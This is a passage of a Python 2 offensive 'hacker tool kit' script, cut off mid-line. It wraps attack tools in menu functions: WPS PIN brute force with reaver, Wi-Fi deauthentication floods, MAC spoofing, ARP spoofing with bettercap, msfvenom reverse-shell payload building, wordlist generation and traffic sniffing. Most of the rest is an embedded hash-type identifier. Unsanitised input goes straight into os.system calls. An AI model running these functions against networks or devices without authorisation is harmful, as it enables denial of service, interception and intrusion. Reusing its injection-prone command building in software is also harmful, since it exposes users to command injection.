WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) 